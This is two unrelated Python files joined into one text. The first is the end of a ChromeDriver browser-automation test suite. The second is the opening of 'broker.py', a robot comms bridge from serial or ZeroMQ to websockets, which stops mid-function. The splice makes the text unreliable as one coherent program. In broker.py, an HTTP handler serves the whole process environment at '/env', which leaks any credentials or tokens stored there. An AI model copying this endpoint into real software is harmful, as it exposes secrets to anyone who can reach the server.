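# With dx=3, dy=4 (distance sqrt(3*3 + 4*4) = 5) at speed 5, this works
# out to int(5 * 30 / 5) = 30 expected touchmove events.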
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchstart", function() {'
' div.innerHTML = "preMove0";'
'});'
'div.addEventListener("touchmove", function() {'
' res = div.innerHTML.match(/preMove(\d+)/);'
' if (res != null) {'
' div.innerHTML = "preMove" + (parseInt(res[1], 10) + 1);'
' }'
'});'
'div.addEventListener("touchend", function() {'
' if (div.innerHTML == "preMove' + str(moveEvents) + '") {'
' div.innerHTML = "new<br>";'
' }'
'});'
'return div;')
self._driver.TouchFlick(div, dx, dy, speed)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testTouchMovedElement(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchmove", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
loc = div.GetLocation()
self._driver.TouchDown(loc['x'], loc['y'])
self._driver.TouchMove(loc['x'] + 1, loc['y'] + 1)
self._driver.TouchUp(loc['x'] + 1, loc['y'] + 1)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testClickElementInSubFrame(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/frame_test.html'))
frame = self._driver.FindElement('tag name', 'iframe')
self._driver.SwitchToFrame(frame)
# Test clicking element in the sub frame.
self.testClickElement()
def testClearElement(self):
text = self._driver.ExecuteScript(
'document.body.innerHTML = \'<input type="text" value="abc">\';'
'var input = document.getElementsByTagName("input")[0];'
'input.addEventListener("change", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return input;')
text.Clear()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testSendKeysToElement(self):
text = self._driver.ExecuteScript(
'document.body.innerHTML = \'<input type="text">\';'
'var input = document.getElementsByTagName("input")[0];'
'input.addEventListener("change", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return input;')
text.SendKeys('0123456789+-*/ Hi')
text.SendKeys(', there!')
value = self._driver.ExecuteScript('return arguments[0].value;', text)
self.assertEquals('0123456789+-*/ Hi, there!', value)
def testGetCurrentUrl(self):
self.assertEquals('data:,', self._driver.GetCurrentUrl())
def testGoBackAndGoForward(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.GoBack()
self._driver.GoForward()
def testRefresh(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.Refresh()
def testMouseMoveTo(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("mouseover", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
self._driver.MouseMoveTo(div, 10, 10)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testMouseClick(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("click", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
self._driver.MouseMoveTo(div)
self._driver.MouseClick()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testMouseButtonDownAndUp(self):
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("mousedown", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new1<br>";'
'});'
'div.addEventListener("mouseup", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new2<a></a>";'
'});')
self._driver.MouseMoveTo(None, 50, 50)
self._driver.MouseButtonDown()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
self._driver.MouseButtonUp()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'a')))
def testMouseDoubleClick(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("dblclick", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
self._driver.MouseMoveTo(div, 1, 1)
self._driver.MouseDoubleClick()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testAlert(self):
self.assertFalse(self._driver.IsAlertOpen())
self._driver.ExecuteScript(
'window.setTimeout('
' function() { window.confirmed = confirm(\'HI\'); },'
' 0);')
self.assertTrue(self._driver.IsAlertOpen())
self.assertEquals('HI', self._driver.GetAlertMessage())
self._driver.HandleAlert(False)
self.assertFalse(self._driver.IsAlertOpen())
self.assertEquals(False,
self._driver.ExecuteScript('return window.confirmed'))
def testShouldHandleNewWindowLoadingProperly(self):
"""Tests that ChromeDriver determines loading correctly for new windows."""
self._http_server.SetDataForPath(
'/newwindow',
"""
<html>
<body>
<a href='%s' target='_blank'>new window/tab</a>
</body>
</html>""" % self._sync_server.GetUrl())
self._driver.Load(self._http_server.GetUrl() + '/newwindow')
old_windows = self._driver.GetWindowHandles()
self._driver.FindElement('tagName', 'a').Click()
new_window = self._WaitForNewWindow(old_windows)
self.assertNotEqual(None, new_window)
self.assertFalse(self._driver.IsLoading())
self._driver.SwitchToWindow(new_window)
self.assertTrue(self._driver.IsLoading())
self._sync_server.RespondWithContent('<html>new window</html>')
self._driver.ExecuteScript('return 1') # Shouldn't hang.
def testPopups(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.ExecuteScript('window.open("about:blank")')
new_window_handle = self._WaitForNewWindow(old_handles)
self.assertNotEqual(None, new_window_handle)
def testNoSuchFrame(self):
self.assertRaises(chromedriver.NoSuchFrame,
self._driver.SwitchToFrame, 'nosuchframe')
self.assertRaises(chromedriver.NoSuchFrame,
self._driver.SwitchToFrame,
self._driver.FindElement('tagName', 'body'))
def testWindowPosition(self):
position = self._driver.GetWindowPosition()
self._driver.SetWindowPosition(position[0], position[1])
self.assertEquals(position, self._driver.GetWindowPosition())
# Resize so the window isn't moved offscreen.
# See https://code.google.com/p/chromedriver/issues/detail?id=297.
self._driver.SetWindowSize(300, 300)
self._driver.SetWindowPosition(100, 200)
self.assertEquals([100, 200], self._driver.GetWindowPosition())
def testWindowSize(self):
size = self._driver.GetWindowSize()
self._driver.SetWindowSize(size[0], size[1])
self.assertEquals(size, self._driver.GetWindowSize())
self._driver.SetWindowSize(600, 400)
self.assertEquals([600, 400], self._driver.GetWindowSize())
def testWindowMaximize(self):
self._driver.SetWindowPosition(100, 200)
self._driver.SetWindowSize(600, 400)
self._driver.MaximizeWindow()
self.assertNotEqual([100, 200], self._driver.GetWindowPosition())
self.assertNotEqual([600, 400], self._driver.GetWindowSize())
# Set size first so that the window isn't moved offscreen.
# See https://code.google.com/p/chromedriver/issues/detail?id=297.
self._driver.SetWindowSize(600, 400)
self._driver.SetWindowPosition(100, 200)
self.assertEquals([100, 200], self._driver.GetWindowPosition())
self.assertEquals([600, 400], self._driver.GetWindowSize())
def testConsoleLogSources(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/console_log.html'))
logs = self._driver.GetLog('browser')
self.assertEquals(len(logs), 2)
self.assertEquals(logs[0]['source'], 'network')
self.assertEquals(logs[1]['source'], 'javascript')
def testAutoReporting(self):
self.assertFalse(self._driver.IsAutoReporting())
self._driver.SetAutoReporting(True)
self.assertTrue(self._driver.IsAutoReporting())
url = self.GetHttpUrlForFile('/chromedriver/console_log.html')
self.assertRaisesRegexp(chromedriver.UnknownError,
'.*(404|Failed to load resource).*',
self._driver.Load,
url)
def testContextMenuEventFired(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/context_menu.html'))
self._driver.MouseMoveTo(self._driver.FindElement('tagName', 'div'))
self._driver.MouseClick(2)
self.assertTrue(self._driver.ExecuteScript('return success'))
def testHasFocusOnStartup(self):
# Some pages (about:blank) cause Chrome to put the focus in URL bar.
# This breaks tests depending on focus.
self.assertTrue(self._driver.ExecuteScript('return document.hasFocus()'))
def testTabCrash(self):
# If a tab is crashed, the session will be deleted.
# When Chrome 31 is released, ChromeDriver will reload the tab instead.
# https://code.google.com/p/chromedriver/issues/detail?id=547
self.assertRaises(chromedriver.UnknownError,
self._driver.Load, 'chrome://crash')
self.assertRaises(chromedriver.NoSuchSession,
self._driver.GetCurrentUrl)
def testDoesntHangOnDebugger(self):
self._driver.ExecuteScript('debugger;')
def testMobileEmulationDisabledByDefault(self):
self.assertFalse(self._driver.capabilities['mobileEmulationEnabled'])
def testChromeDriverSendLargeData(self):
script = 's = ""; for (i = 0; i < 10e6; i++) s += "0"; return s;'
lots_of_data = self._driver.ExecuteScript(script)
self.assertEquals('0'.zfill(int(10e6)), lots_of_data)
def testChromeDriverReceiveAndSendLargeData(self):
lots_of_data = '1'.zfill(int(10e6))
result = self._driver.ExecuteScript('return "%s"' % lots_of_data)
self.assertEquals(lots_of_data, result)
class ChromeDriverAndroidTest(ChromeDriverBaseTest):
"""End to end tests for Android-specific tests."""
def testLatestAndroidAppInstalled(self):
if ('stable' not in _ANDROID_PACKAGE_KEY and
'beta' not in _ANDROID_PACKAGE_KEY):
return
self._driver = self.CreateDriver()
try:
omaha_list = json.loads(
urllib2.urlopen('http://omahaproxy.appspot.com/all.json').read())
for l in omaha_list:
if l['os'] != 'android':
continue
for v in l['versions']:
if (('stable' in v['channel'] and 'stable' in _ANDROID_PACKAGE_KEY) or
('beta' in v['channel'] and 'beta' in _ANDROID_PACKAGE_KEY)):
omaha = map(int, v['version'].split('.'))
device = map(int, self._driver.capabilities['version'].split('.'))
self.assertTrue(omaha <= device)
return
raise RuntimeError('Malformed omaha JSON')
except urllib2.URLError as e:
print 'Unable to fetch current version info from omahaproxy (%s)' % e
def testDeviceManagement(self):
self._drivers = [self.CreateDriver() for x in
android_commands.GetAttachedDevices()]
self.assertRaises(chromedriver.UnknownError, self.CreateDriver)
self._drivers[0].Quit()
self._drivers[0] = self.CreateDriver()
class ChromeDownloadDirTest(ChromeDriverBaseTest):
def __init__(self, *args, **kwargs):
super(ChromeDownloadDirTest, self).__init__(*args, **kwargs)
self._temp_dirs = []
def CreateTempDir(self):
temp_dir = tempfile.mkdtemp()
self._temp_dirs.append(temp_dir)
return temp_dir
def tearDown(self):
# Call the superclass tearDown() method before deleting temp dirs, so that
# Chrome has a chance to exit before its user data dir is blown away from
# underneath it.
super(ChromeDownloadDirTest, self).tearDown()
for temp_dir in self._temp_dirs:
shutil.rmtree(temp_dir)
def testFileDownload(self):
download_dir = self.CreateTempDir()
download_name = os.path.join(download_dir, 'a_red_dot.png')
driver = self.CreateDriver(download_dir=download_dir)
driver.Load(ChromeDriverTest.GetHttpUrlForFile(
'/chromedriver/download.html'))
driver.FindElement('id', 'red-dot').Click()
deadline = time.time() + 60
while True:
time.sleep(0.1)
if os.path.isfile(download_name) or time.time() > deadline:
break
self.assertTrue(os.path.isfile(download_name), "Failed to download file!")
def testDownloadDirectoryOverridesExistingPreferences(self):
user_data_dir = self.CreateTempDir()
download_dir = self.CreateTempDir()
sub_dir = os.path.join(user_data_dir, 'Default')
os.mkdir(sub_dir)
prefs_file_path = os.path.join(sub_dir, 'Preferences')
prefs = {
'test': 'this should not be changed',
'download': {
'default_directory': '/old/download/directory'
}
}
with open(prefs_file_path, 'w') as f:
json.dump(prefs, f)
driver = self.CreateDriver(
chrome_switches=['user-data-dir=' + user_data_dir],
download_dir=download_dir)
with open(prefs_file_path) as f:
prefs = json.load(f)
self.assertEqual('this should not be changed', prefs['test'])
download = prefs['download']
self.assertEqual(download['default_directory'], download_dir)
class ChromeSwitchesCapabilityTest(ChromeDriverBaseTest):
"""Tests that chromedriver properly processes chromeOptions.args capabilities.
Makes sure the switches are passed to Chrome.
"""
def testSwitchWithoutArgument(self):
"""Tests that switch --dom-automation can be passed to Chrome.
Unless --dom-automation is specified, window.domAutomationController
is undefined.
"""
driver = self.CreateDriver(chrome_switches=['dom-automation'])
self.assertNotEqual(
None,
driver.ExecuteScript('return window.domAutomationController'))
class ChromeExtensionsCapabilityTest(ChromeDriverBaseTest):
"""Tests that chromedriver properly processes chromeOptions.extensions."""
def _PackExtension(self, ext_path):
return base64.b64encode(open(ext_path, 'rb').read())
def testExtensionsInstall(self):
"""Checks that chromedriver can take the extensions in crx format."""
crx_1 = os.path.join(_TEST_DATA_DIR, 'ext_test_1.crx')
crx_2 = os.path.join(_TEST_DATA_DIR, 'ext_test_2.crx')
self.CreateDriver(chrome_extensions=[self._PackExtension(crx_1),
self._PackExtension(crx_2)])
def testExtensionsInstallZip(self):
"""Checks that chromedriver can take the extensions in zip format."""
zip_1 = os.path.join(_TEST_DATA_DIR, 'ext_test_1.zip')
self.CreateDriver(chrome_extensions=[self._PackExtension(zip_1)])
def testWaitsForExtensionToLoad(self):
did_load_event = threading.Event()
server = webserver.SyncWebServer()
def RunServer():
time.sleep(5)
server.RespondWithContent('<html>iframe</html>')
did_load_event.set()
thread = threading.Thread(target=RunServer)
thread.daemon = True
thread.start()
crx = os.path.join(_TEST_DATA_DIR, 'ext_slow_loader.crx')
driver = self.CreateDriver(
chrome_switches=['user-agent=' + server.GetUrl()],
chrome_extensions=[self._PackExtension(crx)])
self.assertTrue(did_load_event.is_set())
class ChromeLogPathCapabilityTest(ChromeDriverBaseTest):
"""Tests that chromedriver properly processes chromeOptions.logPath."""
LOG_MESSAGE = 'Welcome to ChromeLogPathCapabilityTest!'
def testChromeLogPath(self):
"""Checks that user can specify the path of the chrome log.
Verifies that a log message is written into the specified log file.
"""
tmp_log_path = tempfile.NamedTemporaryFile()
driver = self.CreateDriver(chrome_log_path=tmp_log_path.name)
driver.ExecuteScript('console.info("%s")' % self.LOG_MESSAGE)
driver.Quit()
self.assertTrue(self.LOG_MESSAGE in open(tmp_log_path.name).read())
class MobileEmulationCapabilityTest(ChromeDriverBaseTest):
"""Tests that ChromeDriver processes chromeOptions.mobileEmulation.
Makes sure the device metrics are overridden in DevTools and user agent is
overridden in Chrome.
"""
@staticmethod
def GlobalSetUp():
def respondWithUserAgentString(request):
return """
<html>
<body>%s</body>
</html>""" % request.GetHeader('User-Agent')
def respondWithUserAgentStringUseDeviceWidth(request):
return """
<html>
<head>
<meta name="viewport" content="width=device-width,minimum-scale=1.0">
</head>
<body>%s</body>
</html>""" % request.GetHeader('User-Agent')
MobileEmulationCapabilityTest._http_server = webserver.WebServer(
chrome_paths.GetTestData())
MobileEmulationCapabilityTest._http_server.SetCallbackForPath(
'/userAgent', respondWithUserAgentString)
MobileEmulationCapabilityTest._http_server.SetCallbackForPath(
'/userAgentUseDeviceWidth', respondWithUserAgentStringUseDeviceWidth)
@staticmethod
def GlobalTearDown():
MobileEmulationCapabilityTest._http_server.Shutdown()
def testDeviceMetricsWithStandardWidth(self):
driver = self.CreateDriver(
mobile_emulation = {
'deviceMetrics': {'width': 360, 'height': 640, 'pixelRatio': 3},
'userAgent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Bui'
'ld/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chr'
'ome/18.0.1025.166 Mobile Safari/535.19'
})
driver.SetWindowSize(600, 400)
driver.Load(self._http_server.GetUrl() + '/userAgent')
self.assertTrue(driver.capabilities['mobileEmulationEnabled'])
self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))
def testDeviceMetricsWithDeviceWidth(self):
driver = self.CreateDriver(
mobile_emulation = {
'deviceMetrics': {'width': 360, 'height': 640, 'pixelRatio': 3},
'userAgent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Bui'
'ld/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chr'
'ome/18.0.1025.166 Mobile Safari/535.19'
})
driver.Load(self._http_server.GetUrl() + '/userAgentUseDeviceWidth')
self.assertTrue(driver.capabilities['mobileEmulationEnabled'])
self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))
def testUserAgent(self):
driver = self.CreateDriver(
mobile_emulation = {'userAgent': 'Agent Smith'})
driver.Load(self._http_server.GetUrl() + '/userAgent')
body_tag = driver.FindElement('tag name', 'body')
self.assertEqual("Agent Smith", body_tag.GetText())
def testDeviceName(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
driver.Load(self._http_server.GetUrl() + '/userAgentUseDeviceWidth')
self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))
body_tag = driver.FindElement('tag name', 'body')
self.assertEqual(
'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Build/JOP40D) AppleW'
'ebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/53'
'5.19',
body_tag.GetText())
def testSendKeysToElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
text = driver.ExecuteScript(
'document.body.innerHTML = \'<input type="text">\';'
'var input = document.getElementsByTagName("input")[0];'
'input.addEventListener("change", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return input;')
text.SendKeys('0123456789+-*/ Hi')
text.SendKeys(', there!')
value = driver.ExecuteScript('return arguments[0].value;', text)
self.assertEquals('0123456789+-*/ Hi, there!', value)
def testHoverOverElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
driver.Load('about:blank')
div = driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("mouseover", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return div;')
div.HoverOver()
self.assertEquals(1, len(driver.FindElements('tag name', 'br')))
def testClickElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
driver.Load('about:blank')
div = driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("click", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.Click()
self.assertEquals(1, len(driver.FindElements('tag name', 'br')))
def testSingleTapElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
driver.Load('about:blank')
div = driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchend", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.SingleTap()
self.assertEquals(1, len(driver.FindElements('tag name', 'br')))
def testTouchDownUpElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
div = driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchend", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
loc = div.GetLocation()
driver.TouchDown(loc['x'], loc['y'])
driver.TouchUp(loc['x'], loc['y'])
self.assertEquals(1, len(driver.FindElements('tag name', 'br')))
class ChromeDriverLogTest(unittest.TestCase):
"""Tests that chromedriver produces the expected log file."""
UNEXPECTED_CHROMEOPTION_CAP = 'unexpected_chromeoption_capability'
LOG_MESSAGE = 'unrecognized chrome option: %s' % UNEXPECTED_CHROMEOPTION_CAP
def testChromeDriverLog(self):
_, tmp_log_path = tempfile.mkstemp(prefix='chromedriver_log_')
chromedriver_server = server.Server(
_CHROMEDRIVER_BINARY, log_path=tmp_log_path)
try:
driver = chromedriver.ChromeDriver(
chromedriver_server.GetUrl(), chrome_binary=_CHROME_BINARY,
experimental_options={ self.UNEXPECTED_CHROMEOPTION_CAP : 1 })
driver.Quit()
except chromedriver.ChromeDriverException, e:
self.assertTrue(self.LOG_MESSAGE in e.message)
finally:
chromedriver_server.Kill()
with open(tmp_log_path, 'r') as f:
self.assertTrue(self.LOG_MESSAGE in f.read())
class PerformanceLoggerTest(ChromeDriverBaseTest):
"""Tests chromedriver tracing support and Inspector event collection."""
def testPerformanceLogger(self):
driver = self.CreateDriver(
experimental_options={'perfLoggingPrefs': {
'enableTimeline': True,
'traceCategories': 'webkit.console,blink.console'
}}, performance_log_level='ALL')
driver.Load(
ChromeDriverTest._http_server.GetUrl() + '/chromedriver/empty.html')
# Mark the timeline; later we will verify the marks appear in the trace.
driver.ExecuteScript('console.time("foobar")')
driver.ExecuteScript('console.timeEnd("foobar")')
logs = driver.GetLog('performance')
driver.Quit()
marked_timeline_events = []
seen_log_domains = {}
for entry in logs:
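# Each performance log entry wraps a DevTools event as a JSON string;
# roughly (a sketch, not the exact payload):
# {'message': '{"message": {"method": "Tracing.dataCollected",
#                           "params": {"cat": "blink.console", ...}}}'}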
devtools_message = json.loads(entry['message'])['message']
method = devtools_message['method']
domain = method[:method.find('.')]
seen_log_domains[domain] = True
if method != 'Tracing.dataCollected':
continue
self.assertTrue('params' in devtools_message)
self.assertTrue(isinstance(devtools_message['params'], dict))
cat = devtools_message['params'].get('cat', '')
# Depending on Chrome version, the events may occur for the webkit.console
# or blink.console category. They will only occur for one of them.
if (cat == 'blink.console' or cat == 'webkit.console'):
self.assertTrue(devtools_message['params']['name'] == 'foobar')
marked_timeline_events.append(devtools_message)
self.assertEquals(2, len(marked_timeline_events))
self.assertEquals({'Network', 'Page', 'Timeline', 'Tracing'},
set(seen_log_domains.keys()))
class SessionHandlingTest(ChromeDriverBaseTest):
"""Tests for session operations."""
def testQuitASessionMoreThanOnce(self):
driver = self.CreateDriver()
driver.Quit()
driver.Quit()
class RemoteBrowserTest(ChromeDriverBaseTest):
"""Tests for ChromeDriver remote browser capability."""
def setUp(self):
self.assertTrue(_CHROME_BINARY is not None,
'must supply a chrome binary arg')
def testConnectToRemoteBrowser(self):
port = self.FindFreePort()
temp_dir = util.MakeTempDir()
process = subprocess.Popen([_CHROME_BINARY,
'--remote-debugging-port=%d' % port,
'--user-data-dir=%s' % temp_dir])
if process is None:
raise RuntimeError('Chrome could not be started with debugging port')
try:
driver = self.CreateDriver(debugger_address='127.0.0.1:%d' % port)
driver.ExecuteScript('console.info("%s")' % 'connecting at %d!' % port)
driver.Quit()
finally:
process.terminate()
def FindFreePort(self):
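# A successful connect means something is already listening on the port;
# a refused connection (socket.error) means the port is likely free.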
for port in range(10000, 10100):
try:
socket.create_connection(('127.0.0.1', port), 0.2).close()
except socket.error:
return port
raise RuntimeError('Cannot find open port')
class PerfTest(ChromeDriverBaseTest):
"""Tests for ChromeDriver perf."""
def setUp(self):
self.assertTrue(_REFERENCE_CHROMEDRIVER is not None,
'must supply a reference-chromedriver arg')
def _RunDriverPerfTest(self, name, test_func):
"""Runs a perf test comparing a reference and new ChromeDriver server.
Args:
name: The name of the perf test.
test_func: Called with the server url to perform the test action. Must
return the time elapsed.
"""
class Results(object):
ref = []
new = []
ref_server = server.Server(_REFERENCE_CHROMEDRIVER)
results = Results()
result_url_pairs = zip([results.new, results.ref],
[_CHROMEDRIVER_SERVER_URL, ref_server.GetUrl()])
for iteration in range(30):
for result, url in result_url_pairs:
result += [test_func(url)]
# Reverse the order for the next run.
result_url_pairs = result_url_pairs[::-1]
def PrintResult(build, result):
mean = sum(result) / len(result)
avg_dev = sum([abs(sample - mean) for sample in result]) / len(result)
print 'perf result', build, name, mean, avg_dev, result
util.AddBuildStepText('%s %s: %.3f+-%.3f' % (
build, name, mean, avg_dev))
# Discard first result, which may be off due to cold start.
PrintResult('new', results.new[1:])
PrintResult('ref', results.ref[1:])
def testSessionStartTime(self):
def Run(url):
start = time.time()
driver = self.CreateDriver(url)
end = time.time()
driver.Quit()
return end - start
self._RunDriverPerfTest('session start', Run)
def testSessionStopTime(self):
def Run(url):
driver = self.CreateDriver(url)
start = time.time()
driver.Quit()
end = time.time()
return end - start
self._RunDriverPerfTest('session stop', Run)
def testColdExecuteScript(self):
def Run(url):
driver = self.CreateDriver(url)
start = time.time()
driver.ExecuteScript('return 1')
end = time.time()
driver.Quit()
return end - start
self._RunDriverPerfTest('cold exe js', Run)
if __name__ == '__main__':
parser = optparse.OptionParser()
parser.add_option(
'', '--chromedriver',
help='Path to chromedriver server (REQUIRED!)')
parser.add_option(
'', '--log-path',
help='Output verbose server logs to this file')
parser.add_option(
'', '--reference-chromedriver',
help='Path to the reference chromedriver server')
parser.add_option(
'', '--chrome', help='Path to a build of the chrome binary')
parser.add_option(
'', '--chrome-version', default='HEAD',
help='Version of chrome. Default is \'HEAD\'.')
parser.add_option(
'', '--filter', type='string', default='*',
help=('Filter for specifying what tests to run, "*" will run all. E.g., '
'*testStartStop'))
parser.add_option(
'', '--android-package',
help=('Android package key. Possible values: ' +
str(_ANDROID_NEGATIVE_FILTER.keys())))
options, args = parser.parse_args()
options.chromedriver = util.GetAbsolutePathOfUserPath(options.chromedriver)
if not options.chromedriver or not os.path.exists(options.chromedriver):
parser.error('chromedriver is required or the given path is invalid. ' +
'Please run "%s --help" for help' % __file__)
global _CHROMEDRIVER_BINARY
_CHROMEDRIVER_BINARY = options.chromedriver
if (options.android_package and
options.android_package not in _ANDROID_NEGATIVE_FILTER):
parser.error('Invalid --android-package')
chromedriver_server = server.Server(_CHROMEDRIVER_BINARY, options.log_path)
global _CHROMEDRIVER_SERVER_URL
_CHROMEDRIVER_SERVER_URL = chromedriver_server.GetUrl()
global _REFERENCE_CHROMEDRIVER
_REFERENCE_CHROMEDRIVER = util.GetAbsolutePathOfUserPath(
options.reference_chromedriver)
global _CHROME_BINARY
if options.chrome:
_CHROME_BINARY = util.GetAbsolutePathOfUserPath(options.chrome)
else:
_CHROME_BINARY = None
global _ANDROID_PACKAGE_KEY
_ANDROID_PACKAGE_KEY = options.android_package
if options.filter == '*':
if _ANDROID_PACKAGE_KEY:
negative_filter = _ANDROID_NEGATIVE_FILTER[_ANDROID_PACKAGE_KEY]
else:
negative_filter = _GetDesktopNegativeFilter(options.chrome_version)
options.filter = '*-' + ':__main__.'.join([''] + negative_filter)
all_tests_suite = unittest.defaultTestLoader.loadTestsFromModule(
sys.modules[__name__])
tests = unittest_util.FilterTestSuite(all_tests_suite, options.filter)
ChromeDriverTest.GlobalSetUp()
MobileEmulationCapabilityTest.GlobalSetUp()
result = unittest.TextTestRunner(stream=sys.stdout, verbosity=2).run(tests)
ChromeDriverTest.GlobalTearDown()
MobileEmulationCapabilityTest.GlobalTearDown()
sys.exit(len(result.failures) + len(result.errors))
|
broker.py | import os
import signal
import sys
import struct
import threading
import argparse
import websockets
import asyncio
import json
from random import random
from collections import defaultdict
from http.server import HTTPServer, SimpleHTTPRequestHandler
try:
import zmq
except ImportError:
pass # ZMQ not needed as a dependency on the robot itself
PACKET_START_BYTE = 0x02 # Matches ../firmware/hal/micro/comms.cpp
MAX_BUFFERED_MESSAGES = 10
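# Wire framing used by send()/read_forever() below (a sketch inferred from
# this file, not a firmware spec): each packet is
# [PACKET_START_BYTE][length][payload], so framing b'ping' yields
# b'\x02\x04ping'.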
class Broker():
def __init__(self, dest, pull=None, motion=None):
self.motion = motion
self.sock = None
self.push = None
self.pull = None
self.q = asyncio.Queue()
if dest.startswith('/dev'):
print("Opening serial connection:", dest)
import serial
self.sock = serial.Serial(port=dest, baudrate=115200, timeout=0.1)
else: # Network
# Socket to talk to server
self.ctx = zmq.Context()
print("Connecting to fw comms PUSH socket:", dest)
self.push = self.ctx.socket(zmq.PUSH)
self.push.connect(dest)
print("Connecting to fw comms PULL socket:", pull)
self.pull = self.ctx.socket(zmq.PULL)
self.pull.connect(pull)
def read_forever(self):
print("Starting comms read loop")
if self.pull is not None:
while True:
try:
data = self.pull.recv()
except zmq.error.Again:
continue
self.q.put_nowait(data)
else:
while True:
stuff = self.sock.read_until(bytes([PACKET_START_BYTE]))
if stuff == b'':
print("No serial data")
continue
sz = self.sock.read(1)
if len(sz) != 1:
print("ERR serial could not read size after sync byte; runup:", stuff[-10:])
continue
sz = int(sz[0])
# Bound the queue size by dropping the oldest entries, rather than raising QueueFull as a bounded queue would.
while self.q.qsize() > MAX_BUFFERED_MESSAGES:
self.q.get_nowait()
if sz == PACKET_START_BYTE: # Print status messages to console
s = '[FW] ' + self.sock.read_until(bytes([0])).decode('utf-8').rstrip('\x00\n\r')
print(s)
self.q.put_nowait(s)
continue
else:
# Note: we don't do any length checking - this is the responsibility of the consumer
self.q.put_nowait(self.sock.read(sz))
async def recv_forever(self, ws):
while True:
msg = await self.q.get()
await ws.send(msg)
def send(self, req):
if self.sock is not None:
self.sock.write(bytes([PACKET_START_BYTE, len(req)]))
self.sock.write(req)
self.sock.flush()
else:
self.push.send(req)
conn = None
def sigterm_handler(_signo, _stack_frame):
sys.exit(0)
signal.signal(signal.SIGTERM, sigterm_handler)
class WebServer(SimpleHTTPRequestHandler):
def do_GET(self):
if self.path == "/env":
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes(json.dumps(dict(os.environ)), "utf-8"))
else:
return SimpleHTTPRequestHandler.do_GET(self)
async def handle_socket(ws, path):
print("WS conn", str(ws))
if args.loopback:
await ws_to_conn(ws)
else:
await asyncio.gather(ws_to_conn(ws), conn.recv_forever(ws))
async def ws_to_conn(ws):
print("Starting ws_to_conn")
async for req in ws:
if args.loopback:
await asyncio.sleep(0.1)
